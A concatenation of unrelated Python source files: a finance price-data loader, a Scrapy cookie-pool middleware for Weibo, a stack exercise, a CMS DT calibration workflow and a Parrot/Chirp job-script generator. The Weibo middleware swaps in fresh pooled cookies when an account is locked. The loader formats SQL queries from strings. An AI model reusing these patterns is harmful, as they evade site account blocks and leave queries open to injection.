        df_price_exists = pd.read_sql("SELECT * FROM PriceIndex WHERE ID_INSTRUMENT ={}".format(id_instrument),acc_engine)
        ws1[row_value_1] = df_fund_index["code"].iloc[i]
        ws1[row_value_2] =df_fund_index["code"].iloc[i]
        # NOTE(review): when the formula cell would be "B3" the formula is
        # written to "A3" with Dts=S instead - looks deliberate for the
        # first column, but worth confirming.
        if row_value_3 == "B3":
            ws1["A3"] = 'replace_ti=BDH({};"PX_LAST";"{}";"";"Dir=V";"CDR=5D";"CshAdjNormal=Y";"CshAdjAbnormal=Y";"CapChg=Y";"Days=A";"Dts=S";"FX=USD";"cols=1;rows={}")'.format(row_value_2,start_date,days_ret)
        else:
            ws1[row_value_3] = 'replace_ti=BDH({};"PX_LAST";"{}";"";"Dir=V";"CDR=5D";"CshAdjNormal=Y";"CshAdjAbnormal=Y";"CapChg=Y";"Days=A";"Dts=H";"FX=USD";"cols=1;rows={}")'.format(row_value_2,start_date,days_ret)
    if hist_data == True:
        wb.save(filename =r"P:\Public\LuanF\L_S_Strat\BB_import\bb_import_new_data.xlsx")
    else:
        wb.save(filename =r"P:\Public\LuanF\L_S_Strat\BB_import\bb_import_old_data.xlsx")
    pass
def yahoo_finance_data(id_instrument):
    """Download (or incrementally update) Yahoo Finance prices for one
    instrument and append them to the PriceIndex table.

    Looks up the instrument's ticker in AssetIndex, then either pulls the
    full history since 2008 (no stored prices yet) or only the rows after
    the most recent stored date.
    """
    asset_index = pd.read_sql("SELECT * FROM AssetIndex WHERE ID_INSTRUMENT ={}".format(id_instrument),acc_engine)
    id_instrument = asset_index["ID_INSTRUMENT"].values[0]
    ticker = asset_index["code"].values[0]
    df_price_exists = pd.read_sql("SELECT * FROM PriceIndex WHERE ID_INSTRUMENT = {}".format(id_instrument),acc_engine).sort_values("Data")
    if df_price_exists.empty:
        # First download: pull the whole history since 2008.
        current_date = datetime.now().strftime("%Y-%m-%d")
        df_price = yf.download(ticker,'2008-1-1', current_date)
        df_price = df_price.astype(float)
        df_price["ID_INSTRUMENT"] = id_instrument
        df_price.reset_index(inplace = True)
        df_price.rename(columns = {"Date":"Data"},inplace = True)
        df_price.rename(columns = {"Adj Close":"Adj_Close"},inplace = True)
        df_price.set_index("ID_INSTRUMENT",inplace = True)
        df_price.to_sql("PriceIndex",acc_engine,if_exists = "append")
        print("New price Data for ID: {} ".format(id_instrument))
    else:
        # Incremental update from the most recent stored date.
        last_price_date = str((df_price_exists.iloc[-1]["Data"]).strftime("%Y-%m-%d"))
        current_date = str(datetime.now().strftime("%Y-%m-%d"))
        if current_date == last_price_date:
            print("Data is already up to date")
            pass
        else:
            df_price = yf.download(ticker,last_price_date, current_date)
            # Drop the first row: it duplicates the last stored date.
            df_price = df_price.iloc[1::]
            df_price = df_price.astype(float)
            df_price["ID_INSTRUMENT"] = id_instrument
            df_price.reset_index(inplace = True)
            df_price.rename(columns = {"Date":"Data"},inplace = True)
            df_price.rename(columns = {"Adj Close":"Adj_Close"},inplace = True)
            df_price.set_index("ID_INSTRUMENT",inplace = True)
            df_price.to_sql("PriceIndex",acc_engine,if_exists = "append")
            print("Data for ID: {} was updated".format(id_instrument))
def get_data():
    """Refresh price history for every non-Bloomberg instrument in AssetIndex."""
    unique_ids = pd.read_sql("SELECT ID_INSTRUMENT,data_source FROM AssetIndex",acc_engine)
    # Bloomberg instruments are loaded through the Excel/BDH workflow instead.
    unique_ids = unique_ids[unique_ids["data_source"] != "bloomberg"]
    # The data_source column was previously zipped in but never used.
    for instrument_id in unique_ids["ID_INSTRUMENT"]:
        yahoo_finance_data(instrument_id)
def main():
    """Script entry point: update Yahoo-sourced price history."""
    get_data()
main() | LusoNX/LongShort-Cointegration-Pairwise-Strategy | Long_SHORT_GIT_HUB/price_data.py | price_data.py | py | 5,762 | python | en | code | 0 | github-code | 50 |
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import json
import logging
import requests
from requests.exceptions import ConnectionError
from scrapy.exceptions import IgnoreRequest
class CookiesMiddleWare():
    """Scrapy downloader middleware that attaches random cookies fetched
    from an external cookie-pool service and rotates them on redirects
    that indicate expired cookies or blocked accounts."""
    def __init__(self, cookies_pool_url):
        self.logger = logging.getLogger(__name__)
        self.cookies_pool_url = cookies_pool_url
    def _get_random_cookies(self):
        """Fetch one random cookie dict from the pool, or None on failure."""
        try:
            # The cookie_pool project must be running first; it serves
            # cookies over a Flask endpoint.
            response = requests.get(self.cookies_pool_url)
            if response.status_code == 200:
                return json.loads(response.text)
        except ConnectionError:
            return None
    def process_request(self, request, spider):
        """Attach a random pool cookie to every outgoing request."""
        cookies = self._get_random_cookies()
        if cookies:
            request.cookies = cookies
            self.logger.debug('Using Cookies ' + json.dumps(cookies))
        else:
            self.logger.debug('No Valid Cookies')
    @classmethod
    def from_crawler(cls, crawler):
        """Build the middleware from the COOKIES_POOL_URL crawler setting."""
        return cls(
            cookies_pool_url=crawler.settings.get('COOKIES_POOL_URL')
        )
    # Handle redirects signalling cookie expiry or blocked accounts.
    def process_response(self, request, response, spider):
        """Retry with fresh cookies on auth redirects; pass others through."""
        if response.status in [300, 301, 302, 303]:
            try:
                # NOTE(review): Scrapy header values may be bytes - confirm
                # the substring checks below behave as intended.
                redirect_url = response.headers['location']
                # Redirected to a login page: this cookie has expired and a
                # new one must be fetched for the account.
                if 'login.weibo' in redirect_url or 'login.sina' in redirect_url:
                    self.logger.warning('Updating Cookies')
                # Redirected to the account-unlock page: account is blocked.
                elif 'weibo.cn/security' in redirect_url:
                    self.logger.warning('Now Cookies' + json.dumps(request.cookies))
                    self.logger.warning('One Account is locked!')
                # Return a new request with a fresh cookie; the middleware
                # chain stops here and the request is rescheduled.
                request.cookies = self._get_random_cookies()
                self.logger.debug('Using Cookies' + json.dumps(request.cookies))
                return request
            except Exception:
                raise IgnoreRequest
        # 414: the request URI was too long for the server - retry as-is.
        elif response.status in [414]:
            return request
        else:
            return response
| XiMuYouZi/Python-crawler-demo | Crawler/Weibo/weibo/middlewares.py | middlewares.py | py | 2,644 | python | en | code | 0 | github-code | 50 |
import sys
# Shared stack storage for the command handlers below (BOJ 10828).
arr = []


def push(n):
    """Push *n* onto the stack."""
    arr.append(n)


def pop():
    """Print and remove the top element, or -1 when the stack is empty."""
    if not arr:
        print(-1)
    else:
        print(arr.pop())


def size():
    """Print the number of stored elements."""
    print(len(arr))


def empty():
    """Print 1 when the stack is empty, otherwise 0."""
    print(1 if not arr else 0)


def top():
    """Print the top element without removing it, or -1 when empty."""
    if not arr:
        print(-1)
    else:
        print(arr[-1])


def main():
    """Read the command count and commands from stdin and execute them."""
    n = int(sys.stdin.readline())
    for _ in range(n):
        msg = sys.stdin.readline().split()
        if msg[0] == "push":
            push(int(msg[1]))
        elif msg[0] == "top":
            top()
        elif msg[0] == "size":
            size()
        elif msg[0] == "empty":
            empty()
        elif msg[0] == "pop":
            pop()


# BUG FIX (robustness): the command loop used to run at import time;
# guard it so importing this module no longer consumes stdin.
if __name__ == "__main__":
    main()
elif msg[0]=="pop": pop() | san9w9n/2020_WINTER_ALGO | 10828.py | 10828.py | py | 598 | python | en | code | 0 | github-code | 50 |
from __future__ import print_function
from __future__ import absolute_import
import os,sys
import glob
import logging
import argparse
import subprocess
import time, datetime
import urllib2
import json
from . import tools
from .CLIHelper import CLIHelper
from .CrabHelper import CrabHelper
import FWCore.ParameterSet.Config as cms
log = logging.getLogger(__name__)
class DTWorkflow(CLIHelper, CrabHelper):
""" This is the base class for all DTWorkflows and contains some
common tasks """
    def __init__(self, options):
        """Store parsed CLI *options* and initialize bookkeeping state.

        Side effect: changes the process working directory to
        ``options.working_dir``.
        """
        self.options = options
        super( DTWorkflow, self ).__init__()
        self.digilabel = "muonDTDigis"
        # dict to hold required variables. Can not be marked in argparse to allow
        # loading of options from config
        self.required_options_dict = {}
        self.required_options_prepare_dict = {}
        self.fill_required_options_dict()
        self.fill_required_options_prepare_dict()
        # These variables are determined in the derived classes
        self.pset_name = ""
        self.outpath_command_tag = ""
        self.output_files = []
        self.input_files = []
        self.run_all_command = False
        self.files_reveived = False
        self._user = ""
        # change to working directory
        os.chdir(self.options.working_dir)
def check_missing_options(self, requirements_dict):
missing_options = []
# check if all required options exist
if self.options.command in requirements_dict:
for option in requirements_dict[self.options.command]:
if not (hasattr(self.options, option)
and ( (getattr(self.options,option))
or isinstance(getattr(self.options,option), bool) )):
missing_options.append(option)
if len(missing_options) > 0:
err = "The following CLI options are missing"
err += " for command %s: " % self.options.command
err += " ".join(missing_options)
raise ValueError(err)
    def run(self):
        """Prepare the workflow, then dispatch to the method named by the
        chosen CLI command (e.g. ``submit``, ``check``, ``write``)."""
        msg = "Preparing %s workflow" % self.options.workflow
        if hasattr(self.options, "command"):
            msg += " for command %s" % self.options.command
        log.info(msg)
        if self.options.config_path:
            self.load_options( self.options.config_path )
        # check if all options to prepare the command are used
        self.check_missing_options(self.required_options_prepare_dict)
        self.prepare_workflow()
        # create output folder if they do not exist yet
        if not os.path.exists( self.local_path ):
            os.makedirs(self.local_path)
        # dump used options
        self.dump_options()
        # check if all options to run the command are used
        self.check_missing_options(self.required_options_dict)
        try:
            # Commands map 1:1 onto methods of this (derived) class.
            run_function = getattr(self, self.options.command)
        except AttributeError:
            # NOTE(review): the concatenated message lacks a space before
            # "and workflow mode".
            errmsg = "Class `{}` does not implement `{}` for workflow %s" % self.options.workflow
            if hasattr(self.options, "workflow_mode"):
                errmsg += "and workflow mode %s" % self.options.workflow_mode
            raise NotImplementedError( errmsg.format(self.__class__.__name__,
                                                     self.options.command))
        log.debug("Running command %s" % self.options.command)
        # call chosen function
        run_function()
def prepare_workflow(self):
""" Abstract implementation of prepare workflow function"""
errmsg = "Class `{}` does not implement `{}`"
raise NotImplementedError( errmsg.format(self.__class__.__name__,
"prepare_workflow"))
    def all(self):
        """ Generalized function to perform several workflow mode commands in chain.
            All commands must be specified in the self.all_commands list set by the
            workflow-mode-specific prepare function of child workflow objects.
        """
        self.run_all_command = True
        for command in self.all_commands:
            # Each command reuses the normal single-command entry point.
            self.options.command = command
            self.run()
    def submit(self):
        """Submit the prepared task to CRAB."""
        self.submit_crab_task()
    def check(self):
        """ Function to check status of submitted tasks """
        self.check_crabtask()
    def write(self):
        """Run the CMSSW task that writes the calibration output."""
        self.runCMSSWtask()
    def dump(self):
        """Run the CMSSW task that dumps a database to text."""
        self.runCMSSWtask()
    def correction(self):
        """Run the CMSSW task that computes the correction."""
        self.runCMSSWtask()
    def add_preselection(self):
        """ Add preselection to the process object stored in workflow_object"""
        if not hasattr(self, "process"):
            raise NameError("Process is not initalized in workflow object")
        # preselection option format: "<module.to.load>:<sequence_name>"
        pathsequence = self.options.preselection.split(':')[0]
        seqname = self.options.preselection.split(':')[1]
        self.process.load(pathsequence)
        tools.prependPaths(self.process, seqname)
    def add_raw_option(self):
        """Make the digi producer read from the RAW data collector."""
        getattr(self.process, self.digilabel).inputLabel = 'rawDataCollector'
        tools.prependPaths(self.process,self.digilabel)
    def add_local_t0_db(self, local=False):
        """ Add a local t0 database as input. The option *local* is used
            if the pset is processed locally and not with crab.
        """
        if local:
            connect = os.path.abspath(self.options.inputT0DB)
        else:
            # presumably non-local (crab) jobs see the file by its basename
            # in the sandbox - the file is shipped via input_files below.
            connect = os.path.basename(self.options.inputT0DB)
        self.addPoolDBESSource( process = self.process,
                                moduleName = 't0DB',
                                record = 'DTT0Rcd',
                                tag = 't0',
                                connect = 'sqlite_file:%s' % connect)
        self.input_files.append(os.path.abspath(self.options.inputT0DB))
    def add_local_vdrift_db(self, local=False):
        """ Add a local vdrift database as input. The option *local* is used
            if the pset is processed locally and not with crab.
        """
        if local:
            connect = os.path.abspath(self.options.inputVDriftDB)
        else:
            connect = os.path.basename(self.options.inputVDriftDB)
        self.addPoolDBESSource( process = self.process,
                                moduleName = 'vDriftDB',
                                record = 'DTMtimeRcd',
                                tag = 'vDrift',
                                connect = 'sqlite_file:%s' % connect)
        self.input_files.append( os.path.abspath(self.options.inputVDriftDB) )
    def add_local_calib_db(self, local=False):
        """ Add a local calib database as input. The option *local* is used
            if the pset is processed locally and not with crab.
        """
        label = ''
        if self.options.datasettype == "Cosmics":
            label = 'cosmics'
        if local:
            connect = os.path.abspath(self.options.inputCalibDB)
        else:
            connect = os.path.basename(self.options.inputCalibDB)
        self.addPoolDBESSource( process = self.process,
                                moduleName = 'calibDB',
                                record = 'DTTtrigRcd',
                                tag = 'ttrig',
                                connect = str("sqlite_file:%s" % connect),
                                label = label
                                )
        self.input_files.append( os.path.abspath(self.options.inputCalibDB) )
    def add_local_custom_db(self):
        """Add a user-specified record/tag/connect string as an ES source."""
        for option in ('inputDBRcd', 'connectStrDBTag'):
            # NOTE(review): a *missing* attribute passes silently here; only
            # a present-but-falsy value raises.  Also inputDBTag is used
            # below but never validated - confirm this is intended.
            if hasattr(self.options, option) and not getattr(self.options, option):
                raise ValueError("Option %s needed for custom input db" % option)
        self.addPoolDBESSource( process = self.process,
                                record = self.options.inputDBRcd,
                                tag = self.options.inputDBTag,
                                connect = self.options.connectStrDBTag,
                                moduleName = 'customDB%s' % self.options.inputDBRcd
                                )
    def prepare_common_submit(self):
        """ Common operations used in most prepare_[workflow_mode]_submit functions"""
        if not self.options.run:
            raise ValueError("Option run is required for submission!")
        # pick up optional local condition databases when the corresponding
        # options are present and non-empty
        if hasattr(self.options, "inputT0DB") and self.options.inputT0DB:
            self.add_local_t0_db()
        if hasattr(self.options, "inputVDriftDB") and self.options.inputVDriftDB:
            self.add_local_vdrift_db()
        if hasattr(self.options, "inputDBTag") and self.options.inputDBTag:
            self.add_local_custom_db()
        if self.options.run_on_RAW:
            self.add_raw_option()
        if self.options.preselection:
            self.add_preselection()
    def prepare_common_write(self, do_hadd=True):
        """ Common operations used in most prepare_[workflow_mode]_write functions"""
        self.load_options_command("submit")
        output_path = os.path.join( self.local_path, "unmerged_results" )
        merged_file = os.path.join(self.result_path, self.output_file)
        crabtask = self.crabFunctions.CrabTask(crab_config = self.crab_config_filepath,
                                               initUpdate = False)
        # NOTE(review): 'files_reveived' looks like a typo of 'files_received';
        # the attribute is set elsewhere under that name, so it is kept here
        if not (self.options.skip_stageout or self.files_reveived or self.options.no_exec):
            self.get_output_files(crabtask, output_path)
            log.info("Received files from storage element")
        log.info("Using hadd to merge output files")
        if not self.options.no_exec and do_hadd:
            returncode = tools.haddLocal(output_path, merged_file)
            if returncode != 0:
                raise RuntimeError("Failed to merge files with hadd")
        return crabtask.crabConfig.Data.outputDatasetTag
def prepare_common_dump(self, db_path):
self.process = tools.loadCmsProcess(self.pset_template)
self.process.calibDB.connect = 'sqlite_file:%s' % db_path
try:
path = self.result_path
except:
path = os.getcwd()
print("path", path)
out_path = os.path.abspath(os.path.join(path,
os.path.splitext(db_path)[0] + ".txt"))
self.process.dumpToFile.outputFileName = out_path
    @staticmethod
    def addPoolDBESSource( process,
                           moduleName,
                           record,
                           tag,
                           connect='sqlite_file:',
                           label='',):
        """ Attach a PoolDBESSource named `moduleName` to `process`, serving
            `record`/`tag` from the given `connect` string, and register an
            ESPrefer so this source wins over others for that record.
        """
        from CondCore.CondDB.CondDB_cfi import CondDB
        calibDB = cms.ESSource("PoolDBESSource",
                               CondDB,
                               timetype = cms.string('runnumber'),
                               toGet = cms.VPSet(cms.PSet(
                                   record = cms.string(record),
                                   tag = cms.string(tag),
                                   label = cms.untracked.string(label)
                                   )),
                               )
        calibDB.connect = cms.string( str(connect) )
        #if authPath: calibDB.DBParameters.authenticationPath = authPath
        # oracle connections need the CERN conditions DB authentication path
        if 'oracle:' in connect:
            calibDB.DBParameters.authenticationPath = '/afs/cern.ch/cms/DB/conddb'
        setattr(process,moduleName,calibDB)
        setattr(process,"es_prefer_" + moduleName,cms.ESPrefer('PoolDBESSource',
                                                               moduleName)
                                                               )
    def get_output_files(self, crabtask, output_path):
        """ Fetch the job output of `crabtask` from the storage element into
            `output_path` using 'crab getoutput'. """
        self.crab.callCrabCommand( ["getoutput",
                                    "--outputpath",
                                    output_path,
                                    crabtask.crabFolder ] )
def runCMSSWtask(self, pset_path=""):
""" Run a cmsRun job locally. The member variable self.pset_path is used
if pset_path argument is not given"""
if self.options.no_exec:
return 0
process = subprocess.Popen( "cmsRun %s" % self.pset_path,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell = True)
stdout = process.communicate()[0]
log.info(stdout)
if process.returncode != 0:
raise RuntimeError("Failed to use cmsRun for pset %s" % self.pset_name)
return process.returncode
    @property
    def remote_out_path(self):
        """ Output path on remote excluding user base path
            Returns a dict if crab is used due to crab path setting policy"""
        if self.options.command =="submit":
            return {
                "outLFNDirBase" : os.path.join( "/store",
                                                "user",
                                                self.user,
                                                'DTCalibration/',
                                                self.outpath_command_tag,
                                                self.outpath_workflow_mode_tag),
                "outputDatasetTag" : self.tag
                }
        else:
            # NOTE(review): 'datasetstr' is not defined in this scope, so this
            # branch raises NameError when reached -- confirm the intended
            # value (probably derived from the dataset option)
            return os.path.join( 'DTCalibration/',
                                 datasetstr,
                                 'Run' + str(self.options.run),
                                 self.outpath_command_tag,
                                 self.outpath_workflow_mode_tag,
                                 'v' + str(self.options.trial),
                                )
    @property
    def outpath_workflow_mode_tag(self):
        # map the chosen workflow mode to its output folder tag
        if not self.options.workflow_mode in self.outpath_workflow_mode_dict:
            raise NotImplementedError("%s missing in outpath_workflow_mode_dict" % self.options.workflow_mode)
        return self.outpath_workflow_mode_dict[self.options.workflow_mode]
    @property
    def tag(self):
        """ Version tag used in output paths, e.g. 'Run123456_v1' """
        return 'Run' + str(self.options.run) + '_v' + str(self.options.trial)
    @property
    def user(self):
        """ Grid user name: taken from the options if given, otherwise queried
            from crab once and cached in self._user """
        if self._user:
            return self._user
        if hasattr(self.options, "user") and self.options.user:
            self._user = self.options.user
        else:
            self._user = self.crab.checkusername()
        return self._user
    @property
    def local_path(self):
        """ Output path on local machine """
        if self.options.run and self.options.label:
            prefix = "Run%d-%s_v%d" % ( self.options.run,
                                        self.options.label,
                                        self.options.trial)
        else:
            prefix = ""
        # the workflow-mode tag takes precedence over the command tag
        if self.outpath_workflow_mode_tag:
            path = os.path.join( self.options.working_dir,
                                 prefix,
                                 self.outpath_workflow_mode_tag)
        else:
            path = os.path.join( self.options.working_dir,
                                 prefix,
                                 self.outpath_command_tag )
        return path
    @property
    def result_path(self):
        """ Absolute path to the results folder, created on first access """
        result_path = os.path.abspath(os.path.join(self.local_path,"results"))
        if not os.path.exists(result_path):
            os.makedirs(result_path)
        return result_path
    @property
    def pset_template_base_bath(self):
        """ Base path to folder containing pset files for cmsRun"""
        # NOTE(review): 'bath' is a typo for 'path', but renaming would break
        # external users of this property
        return os.path.expandvars(os.path.join("$CMSSW_BASE",
                                               "src",
                                               "CalibMuon",
                                               "test",
                                               )
                                  )
    @property
    def pset_path(self):
        """ full path to the pset file """
        basepath = os.path.join( self.local_path, "psets")
        if not os.path.exists( basepath ):
            os.makedirs( basepath )
        return os.path.join( basepath, self.pset_name )
    def write_pset_file(self):
        """ Dump self.process as a python config file to self.pset_path """
        if not hasattr(self, "process"):
            raise NameError("Process is not initalized in workflow object")
        if not os.path.exists(self.local_path):
            os.makedirs(self.local_path)
        with open( self.pset_path,'w') as pfile:
            pfile.write(self.process.dumpPython())
def get_config_name(self, command= ""):
""" Create the name for the output json file which will be dumped"""
if not command:
command = self.options.command
return "config_" + command + ".json"
    def dump_options(self):
        """ Serialize all current options as json into the local path """
        with open(os.path.join(self.local_path, self.get_config_name()),"w") as out_file:
            json.dump(vars(self.options), out_file, indent=4)
    def load_options(self, config_file_path):
        """ Load options from a json config file. Only options that are not
            already set are taken from the file.
        """
        if not os.path.exists(config_file_path):
            raise IOError("File %s not found" % config_file_path)
        with open(config_file_path, "r") as input_file:
            config_json = json.load(input_file)
        for key, val in config_json.items():
            # options already set (e.g. on the command line) win over the file
            if not hasattr(self.options, key) or not getattr(self.options, key):
                setattr(self.options, key, val)
    def load_options_command(self, command ):
        """Load options for previous command in workflow """
        if not self.options.config_path:
            if not self.options.run:
                raise RuntimeError("Option run is required if no config path specified")
            if not os.path.exists(self.local_path):
                raise IOError("Local path %s does not exist" % self.local_path)
            # default to the config dumped by the previous command
            self.options.config_path = os.path.join(self.local_path,
                                                    self.get_config_name(command))
        self.load_options( self.options.config_path )
| cms-sw/cmssw | CalibMuon/DTCalibration/python/Workflow/DTWorkflow.py | DTWorkflow.py | py | 17,966 | python | en | code | 985 | github-code | 50 |
70082183197 |
class Node:
    """A tree node holding a payload and a (initially empty) child list."""
    def __init__(self, d):
        self.data, self.children = d, []
class Directory:
    """N-ary tree of Nodes addressed by their payload values."""
    def __init__(self, root = None):
        self.root = root
    def search(self, data):
        """Return the first node (depth-first) whose payload equals data, or None."""
        return self.searchAux(self.root, data)
    def searchAux(self, node, data):
        # depth-first lookup starting at node
        if node is None:
            return None
        if node.data == data:
            return node
        for child in node.children:
            found = self.searchAux(child, data)
            if found is not None:
                return found
        return None
    def add(self, data, parent = None):
        """Insert data under the node holding parent; becomes root if empty."""
        if self.root is None:
            self.root = Node(data)
            return
        target = self.search(parent)
        if target is None:
            # unknown parent: silently ignore the insertion
            return
        target.children.append(Node(data))
    def remove(self, data):
        """Detach and return the first node holding data, or None (root cannot be removed)."""
        located = self.removeAux(self.root, data)
        if located is None:
            return None
        parent_node, idx = located
        return parent_node.children.pop(idx)
    def removeAux(self, node, data):
        # return (parent, child-index) of the node holding data, or None
        if node is None:
            return None
        for idx, child in enumerate(node.children):
            if child is not None and child.data == data:
                return (node, idx)
            deeper = self.removeAux(child, data)
            if deeper is not None:
                return deeper
        return None
# Demo: build a small directory tree and exercise search/remove.
# Renamed the variable from 'dir' to avoid shadowing the builtin dir().
tree = Directory()
tree.add("home")
tree.add("doc", "home")
tree.add("estrc.txt", "doc")
print("hi")
print(tree.search("estrc.txt").data)
print(tree.remove("estrc.txt").data)
| amchp/ST0245-001 | laboratorios/lab04/codigo/Directorios.py | Directorios.py | py | 1,531 | python | en | code | 0 | github-code | 50 |
26500205426 | #!/usr/bin/python
import optparse, os, sys, ConfigParser, getpass, re, urlparse, time
VERSION = '0.3'
def get_directories(config, dir_type):
    """
    Get read or write directories and return formatted list
    """
    # dir_type is e.g. 'read' or 'write'; the config value is a
    # comma-separated list of chirp paths
    if config.has_option('Directories', dir_type) and config.get('Directories', dir_type) != '':
        directories = config.get('Directories', dir_type).split(',')
        # NOTE(review): under Python 2 map() returns a list, which callers
        # rely on; this module uses py2-only imports (ConfigParser/urlparse)
        directories = map(lambda x: x.strip(), directories)
        return directories
    else:
        return []
def set_chirp_acls(directory, base_dir, acl = 'r'):
    """
    Check acls for a directory and set it if needed
    """
    # NOTE(review): the acl parameter is currently unused; the user is always
    # granted full 'rwlda' permissions regardless of the requested acl
    real_dir = prefix_base(base_dir, directory)
    if not os.path.exists(real_dir) or not os.path.isdir(real_dir):
        return False
    # chirp stores per-directory permissions in a hidden .__acl file
    acl_file = os.path.join(real_dir, '.__acl')
    user = getpass.getuser()
    if not os.path.exists(acl_file):
        acl_perms = "unix:%s rwlda\n" % (user)
        open(acl_file, 'w').write(acl_perms)
        return True
    buf = open(acl_file).read()
    # look for an existing entry for this unix user
    match = re.search("unix:%s\s+([a-z]*)\s" % user, buf)
    if match is None:
        buf += "unix:%s rwlda\n" % (user)
    elif 'rwlda' in match.group(1):
        # already has full permissions, nothing to do
        return True
    else:
        # upgrade the existing entry to full permissions
        buf = re.sub("unix:%s\s+([a-z]*)\s" % user, "unix:%s rwlda" % user, buf)
    open(acl_file, 'w').write(buf)
    # NOTE(review): resetacl is invoked with the logical directory, not
    # real_dir -- confirm that is intended
    os.system("resetacl %s rwlda" % directory)
    return True
def prefix_base(base_dir, path):
    """Join path onto base_dir, treating absolute paths as relative to it."""
    if path == '/':
        return base_dir
    relative = path[1:] if path[0] == '/' else path
    return os.path.join(base_dir, relative)
def get_chirp_host():
    """
    Get chirp host information, starting chirp if necessary
    """
    chirp_dir = os.path.expanduser('~/.chirp')
    # presence of this marker file indicates a running chirp server
    if not os.path.exists(os.path.join(chirp_dir, 'chirp_running')):
        os.system('/usr/local/bin/chirp_control start')
        # give the server a moment to start and write its port file
        time.sleep(3)
    port = open(os.path.join(chirp_dir, 'chirp.port')).read().strip()
    return "uc3-data.uchicago.edu:%s" % port
def generate_xrootd_args(config):
    """
    Generate xrootd specific arguments for parrot_run based on config file

    Currently a stub: no xrootd-specific arguments are produced.
    """
    return ""
def set_cvmfs_key(cvmfs_options, key):
    """
    Set CVMFS pubkey option in cvmfs_options string, replacing current key if present
    """
    # the key file lands in the job directory under its basename
    key_file = urlparse.urlparse(key)[2].split('/')[-1]
    if 'pubkey' not in cvmfs_options:
        return cvmfs_options + ",pubkey=" + key_file
    rewritten = []
    for opt in cvmfs_options.split(','):
        if 'pubkey' in opt:
            rewritten.append("pubkey=" + key_file)
        else:
            rewritten.append(opt)
    return ",".join(rewritten)
def parse_cvmfs_options(config):
    """
    Generate cvmfs specific arguments for parrot_run based on config file

    Returns a tuple (args, keys): the parrot '-r' repository argument string
    and the list of public key URLs to download. Exits the process if a
    repoN entry lacks its key or options.
    """
    args = " -r '<default-repositories>"
    keys = []
    if not config.has_section('CVMFS'):
        return ("", [])
    # repositories are numbered repo1, repo2, ... until a gap is found
    repo_num = 1
    while True:
        repo_opt = "repo%s" % repo_num
        if not config.has_option('CVMFS', repo_opt):
            # no more repos to add
            args += "' "
            break
        opt_name = "repo%s_key" % repo_num
        if config.has_option('CVMFS', opt_name):
            key = config.get('CVMFS', opt_name)
            if key not in keys:
                keys.append(key)
        else:
            sys.stderr.write("Missing %s in CVMFS section\n" % opt_name)
            sys.exit(1)
        opt_name = "repo%s_options" % repo_num
        if config.has_option('CVMFS', opt_name):
            cvmfs_options = config.get('CVMFS', opt_name)
            # make sure the options point at this repo's downloaded key file
            cvmfs_options = set_cvmfs_key(cvmfs_options, keys[-1])
        else:
            sys.stderr.write("Missing %s in CVMFS section\n" % opt_name)
            sys.exit(1)
        args += " %s:%s" % (config.get('CVMFS', repo_opt),
                            cvmfs_options)
        repo_num += 1
    return (args, keys)
# Entry point: read the job config, set up chirp ACLs and a chirp ticket,
# then generate job_script.sh which downloads parrot and runs the
# application inside it on the worker node.
if __name__ == '__main__':
    parser = optparse.OptionParser(usage='Usage: %prog [options] arg1 arg2',
                                   version='%prog ' + VERSION)
    parser.add_option('-c',
                      '--config-file',
                      action='store',
                      dest='config_file',
                      default='',
                      help='Configuration file')
    (options, args) = parser.parse_args()
    if options.config_file == '':
        parser.exit(msg='Must give a config file')
    if not os.path.exists(options.config_file) or not os.path.isfile(options.config_file):
        sys.stderr.write("Config file %s not found, exting...\n" % options.config_file)
        sys.exit(1)
    config = ConfigParser.SafeConfigParser()
    config.read(options.config_file)
    read_directions = []
    write_directions = []
    ticket = ""
    chirp_host = get_chirp_host()
    # grant ACLs on all exported directories and create one chirp ticket
    # covering them (read-only for 'read' dirs, read-write for 'write' dirs)
    if config.has_section('Directories'):
        read_directories = get_directories(config, 'read')
        write_directories = get_directories(config, 'write')
        ticket_call = "chirp %s ticket_create -output myticket.ticket -bits 1024 -duration 86400 " % chirp_host
        base_dir = config.get('Directories', 'chirp_base')
        for directory in read_directories:
            if not set_chirp_acls(directory, base_dir, 'r'):
                sys.stderr.write("Can't set read acl for %s\n" % directory)
                sys.exit(1)
            ticket_call += " %s rl " % directory
        for directory in write_directories:
            if not set_chirp_acls(directory, base_dir, 'w'):
                sys.stderr.write("Can't set write acl for %s\n" % directory)
                sys.exit(1)
            ticket_call += " %s rwl " % directory
        retcode = os.system(ticket_call)
        if os.WEXITSTATUS(retcode) != 0:
            sys.stderr.write("Can't create ticket\n")
            # sys.exit(1)
        # the ticket is embedded in the shell script, so escape double quotes
        ticket = open('myticket.ticket').read().replace('"', r'\"')
        os.unlink('myticket.ticket')
    parrot_url = 'http://uc3-data.uchicago.edu/parrot.tar.gz'
    if config.has_section('Parrot'):
        if config.has_option('Parrot', 'location') and config.get('Parrot', 'location') != '':
            parrot_url = config.get('Parrot', 'location')
    if not config.has_option('Application', 'script'):
        sys.stderr.write("Must give an script to run\n")
        sys.exit(1)
    # assemble the wrapper shell script piece by piece
    script_contents = "#!/bin/bash\n"
    script_contents += "curr_dir=`cwd`\n"
    script_contents += "ticket=\"\n%s\n\"\n" % ticket
    script_contents += "temp_directory=`mktemp -d`\n"
    script_contents += '''
    cd $temp_directory
    echo "$ticket" > chirp.ticket'''
    script_contents += "\nwget %s\n" % parrot_url
    script_contents += "tar xzf %s \n" % parrot_url.split('/')[-1]
    if config.has_option('Application', 'location') and config.get('Application', 'location') != '':
        script_contents += "wget %s\n" % config.get('Application', 'location')
        script_contents += "tar xzf %s\n" % config.get('Application', 'location').split('/')[-1]
    arguments = ''
    if config.has_option('Application', 'arguments'):
        arguments = config.get('Application', 'arguments')
    if config.has_option('Application', 'http_proxy') and config.get('Application', 'http_proxy') != '':
        script_contents += "export HTTP_PROXY=%s\n" % config.get('Application', 'http_proxy')
    (cvmfs_arguments, pubkeys) = parse_cvmfs_options(config)
    for pubkey in pubkeys:
        script_contents += "wget %s\n" % pubkey
    xrootd_arguments = generate_xrootd_args(config)
    script_contents += "export CHIRP_MOUNT=/chirp/%s\n" % chirp_host
    script_contents += "export PARROT_ALLOW_SWITCHING_CVMFS_REPOSITORIES=1\n"
    script_contents += "export PARROT_HELPER=`pwd`/parrot/lib/libparrot_helper.so\n"
    script_contents += "./parrot/bin/parrot_run -a ticket -i ./chirp.ticket "
    script_contents += "-t $temp_directory/parrot_cache "
